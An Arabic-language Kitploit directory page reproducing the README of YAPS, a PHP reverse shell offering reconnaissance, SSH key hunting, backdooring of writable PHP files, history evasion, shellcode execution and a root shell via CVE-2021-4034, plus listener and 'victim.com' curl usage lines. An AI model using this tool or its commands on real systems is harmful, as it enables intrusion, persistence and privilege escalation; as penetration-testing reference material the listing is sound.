Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nickguitar/yaps
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كودجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubnickguitar/yaps

YAPS

849منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

شل PHP عكسي آخر - الأكثر اكتمالاً بين شلات PHP العكسية

عرض المستودع

YAPS - Yet Another PHP Shell

image

نعم، كما يكشف الاسم، هذه قشرة عكسية أخرى لـ PHP، واحدة أخرى من بين المئات المتاحة، ولكن مع بعض المزايا. إنها ملف PHP واحد يحتوي على جميع وظائفها ويمكنك التحكم بها عبر مستمع TCP بسيط (مثل nc -lp 1337).

في الإصدار الحالي (1.5)، تدعم وظائفه الرئيسية أنظمة لينكس فقط، لكنني أخطط لجعلها تعمل مع ويندوز أيضًا.

إنه حاليًا في إصداره الأول ولم أختبره كثيرًا بعد، ولا يزال هناك أشياء كثيرة أنوي القيام بها وتحسينها للإصدارات القادمة (لم يكتمل بعد!)، لذا أرجو إبلاغي إذا وجدت أي أخطاء أو لديك اقتراح لميزة أو تحسين. =)

الميزات

  • ملف PHP واحد (لا حاجة لتثبيت حزم أو مكتبات أو تنزيل الكثير من الملفات)
  • يعمل مع netcat و ncat و socat و multi/handler وجميع المستمعين تقريبًا
  • حماية بكلمة مرور قابلة للتخصيص
  • لا توجد سجلات في .bash_history
  • يقوم ببعض عمليات الاستكشاف
    • معلومات الشبكة (الواجهات، قواعد iptables، المنافذ النشطة)
    • معلومات المستخدم
    • سرد ملفات SUID و GUID
    • البحث عن مفاتيح SSH (عامة وخاصة)
    • سرد crontab
    • سرد ملفات PHP القابلة للكتابة
  • تنزيل LinPEAS أو LinEnum أو Linux Exploit Suggester تلقائيًا
  • كتابة وتنفيذ كود PHP على الجهاز البعيد
  • إنشاء شل تفاعلي عكسي
  • تكرار أي عدد من الاتصالات التي تريدها
  • التحديث التلقائي
  • إصابة ملفات PHP بأبواب خلفية
  • شل جذر عكسي تلقائي عبر pwnkit (CVE-2021-4034)
  • [جديد] إرسال وتنفيذ شيلكود

العيوب

  • الاتصال غير مشفر (حتى الآن) (nc لا يدعم SSL)
  • غير تفاعلي بالكامل (على الرغم من أنه يمكنك إنشاء شل تفاعلي باستخدام !interactive)
    • CTRL+C يقطعه؛ لا يمكن استخدام الأسهم للتنقل (إلا إذا استخدمت rlwrap nc -lp <ip> <port>)

الاستخدام

  1. قم بإعداد مستمع TCP.
  2. قم بتعيين عنوان IP والمنفذ الخاصين بك. يمكن القيام بذلك عن طريق:
  • 2.1 تحرير المتغيرات في بداية البرنامج النصي؛
  • 2.2 تعيينها عبر طلب POST (curl -x POST -d "x=ip:port" victim.com/yaps.php)؛
  1. افتح yaps.php في المتصفح، أو استخدم curl، أو قم بتشغيله عبر CLI؛
  • 3.1 يمكنك تعيين yaps.php?s أو yaps.php?silent لإخفاء الشعار
  • 3.2 يمكنك التشغيل عبر CLI باستخدام php yaps.php ip port
  1. اخترق!

الأوامر العاملة

  • !help - عرض قائمة المساعدة
  • !all-colors - تبديل جميع الألوان (متوافق مع TTY عديم اللون)
  • !color - تبديل لون PS1 (محليًا فقط، لا يتم تغيير أي متغير بيئة)
  • !duplicate - إنشاء اتصال YAPS آخر
  • !enum - تنزيل LinPEAS و LinEnum إلى /tmp وتجهيزهما للاستخدام
  • !info - سرد معلومات حول الهدف (الاستكشاف الذي ذكرته أعلاه)
  • !infect - إصابة ملفات PHP القابلة للكتابة بأبواب خلفية
  • !interactive - إنشاء شل عكسي تفاعلي على منافذ أخرى (يعمل مع sudo و su و mysql وغيرها)
  • !passwd - خيار كلمة المرور (تمكين، تعطيل، تعيين، تعديل)
  • !php - كتابة وتنفيذ PHP على الجهاز البعيد
  • !pwnkit - محاولة استغلال CVE-2021-4034 وإنشاء شل جذر عكسي

لقطات الشاشة

انقر لتوسيع قسم لقطات الشاشة

الأوامر الحالية:

commands

القيام ببعض الاستطلاع:

image

شل جذر عكسي عبر CVE-2021-4034

pwn

إرسال وتنفيذ شيلكود!

shellcode

إنشاء شل تفاعلي

interactive

تكرار جلسة YAPS

duplicate

تسميم ملفات PHP

سجل التغييرات

الإصدار 1.5 - 12/02/2022

  • إضافة !shellcode لاستقبال وتنفيذ شيلكود عشوائي
  • تحسين وظيفة duplicate() (يمكنك الآن تحديد نطاق من المنافذ)
  • تغيير اسم الوظيفة من stabilize إلى interactive
  • حزم الأكواد المضمنة لتوفير المساحة
  • إصلاح الروابط المعطلة
  • إضافة "TERM=xterm" قبل جميع الأوامر
  • تحسينات طفيفة

الإصدار 1.4 - 04/02/2022

  • إضافة !pwnkit لاستغلال CVE-2021-4034 وإنشاء شل جذر عكسي
  • تحسين وظيفة verify_update()
  • تحسينات طفيفة

الإصدار 1.3.1 - 01/08/2021

  • إصلاح الأخطاء

الإصدار 1.3 - 28/07/2021

  • إضافة !infect لإصابة ملفات PHP بأبواب خلفية
  • تغيير حمولة !stabilize (إصلاح الأخطاء)

الإصدار 1.2.2 - 18/07/2021

  • تغيير وظيفة 'update'
  • تغيير وظيفة 'connect'
  • تحسين وظيفة 'download'
  • إصلاح الأخطاء

الإصدار 1.2.1 - 17/07/2021

  • إصلاح الأخطاء

الإصدار 1.2 - 17/07/2021

  • إضافة !duplicate لإنشاء شل آخر
  • إضافة التحقق من التحديث (--update|-u)
  • إضافة وسائط CLI (--help|-h)
  • إضافة مأخذ عبر الوسائط (php yaps.php ip port)
  • تغيير طريقة تثبيت الشل (لم يعد يتجمد)
  • تغيير طريقة التنزيل
  • تغيير طريقة الاتصال عبر POST (استقبال معامل واحد)

الإصدار 1.1 - 12/07/2021

  • إضافة !all-colors لتبديل ألوان الطرفية والعمل مع TTYs عديمة اللون
  • إضافة أمر exit لإغلاق المأخذ (مغادرة الشل)
  • تغيير الحمولة في !stabilize لتعطيل HISTSIZE و HISTFILE
  • تغيير طريقة الحصول على معلومات CPU و meminfo في !info

الإصدار 1.0.1 - 08/07/2021

  • تغيير [x,y,z] إلى array(x,y,z) لتحسين التوافق مع إصدارات PHP الأقدم
  • تغيير الحمولة للشل التفاعلي لتعمل مع PHP<5.4

الإسناد

بعض الأفكار مستوحاة من هذه الأدوات:

لينبياس

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

ليننام

https://github.com/rebootuser/LinEnum

مقتاح الاستغلال

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

بينتيست مونكي

https://github.com/pentestmonkey/php-reverse-shell

استغلال أرثيبسي لـ pwnkit

https://github.com/arthepsy/CVE-2021-4034/

تنزيل الأداة
  • !shellcode - إرسال وتنفيذ شيلكود على الجهاز البعيد
  • !suggester - تنزيل Linux Exploit Suggester إلى /tmp وتجهيزه للاستخدام
  • infect

    كتابة كود PHP عن بُعد

    remotephp

    شل محمي بكلمة مرور

    passprotected